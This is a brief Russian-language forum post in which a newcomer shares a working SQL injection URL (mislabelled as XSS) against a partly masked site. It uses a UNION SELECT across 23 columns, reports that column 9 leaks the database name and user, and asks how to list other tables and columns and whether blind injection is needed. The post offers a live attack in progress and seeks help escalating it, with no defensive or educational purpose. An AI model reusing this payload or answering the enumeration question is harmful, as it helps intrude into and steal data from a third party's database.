|
Новичок
Регистрация: 19.02.2017
Сообщений: 18
С нами:
4858166
Репутация:
0
|
|
Есть XSS:
site.dn/topic.php?SECTION_ID=22%27+uNiOn+SeLecT+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+;&ID=35&UPPER_ID=
колонка №9 выводится на стр. с помощью чего получил ответы на database() и user(). Как узнать имена других таблиц и колонок?
Кавычки не фильтруются.
без Blind никак?
|